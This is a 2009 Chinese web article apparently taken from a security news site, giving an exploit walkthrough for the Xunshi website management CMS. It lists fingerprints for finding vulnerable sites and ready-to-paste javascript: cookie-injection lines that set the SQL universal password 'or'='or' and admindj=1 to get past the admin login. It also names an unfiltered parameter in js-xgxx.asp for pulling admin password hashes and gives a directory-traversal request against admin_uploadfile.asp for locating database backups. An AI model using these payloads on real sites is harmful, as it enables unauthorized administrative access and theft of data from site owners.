讯时网站管理系统漏洞利用pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报讯时网站管理系统漏洞利用

讯时网站管理系统漏洞利用


2009/4/21  编辑:佚名 来源:本站整理

当前最新讯时网站管理系统system又有漏洞了, 哎......真的不想说了, 大家我自己看吧!没意思, 真的没有什么意识, 真的很明白中国的这些程序员到底是就在干什么, 受不了:

漏洞: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录, 下面的数据信息库是用的db/#ewebeditor.asp
上面特证只要中二个就可以说是可以能够肯定是这套系统

漏洞:COOKIES注入和列目录问题

利用方法:1、老版中存在一个后台COOKIES注入
直接打开登陆后台, 之后在地址栏输入

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

这个功能就是把用户名和密码布置设置 为'or'='or' (这个有什么用不说了吧), 还是有把admindj设置为1


按回车后, 直接访问 /管理目录/admin_index.asp就进后台了, 后台直接有备分COPY功能
管理目录自己找一下, 一般在LOGIN.ASP的同级目录

2、其中的投票文件程序过滤不严, js-xgxx.asp文件的xgnews参数没有过滤, 具体的可以一网友朋友写的专用小必备工具(也可以对其它某些有COOKIES注入, 但关键字和其它一些参数是固定了, 作用有可能不大, 只是我们自己写来娱乐一下的, 牛人一定不要笑)
用这个直接可以得到管理员用户名和密码的MD5
有了MD5可以去破解, 如果破不了把上面的改一下
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("密码md5值"));javascript:alert(document.cookie="admindj="+escape("1"));
确定后直进后台

3、如果以上还是不行那就看......还是cookies问题, 有某些版本中过滤了COOKIES中的'号, 这样我们的万能密码就起不了作用了, asp文件的COOKIES注入过没戏了, 但是admindj=1还有用, 输入完上面的代码后, 如果还进不了后台, 那就访问 /edit/admin_uploadfile.asp?id=14&dir=.., 然后跟EWEBEDITOR的列目录漏洞一样, 只有请求需要改变dir=后面的参数就可以看到查应的目录, 如dir=..\.. dir=..\..\..
可以找一些他的数据库备份啊或其它的。

不说了, 没有什么要说了, 该说的也说了, 都是这些漏洞, 大家知道利用就好了, 但是不要做什么坏事哦, 否则与中国电脑计算机网无关, 特此申明下。
 

相关文章
  • 讯时网站管理系统CMS v3.7漏洞
  • 讯时网站管理系统漏洞利用
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图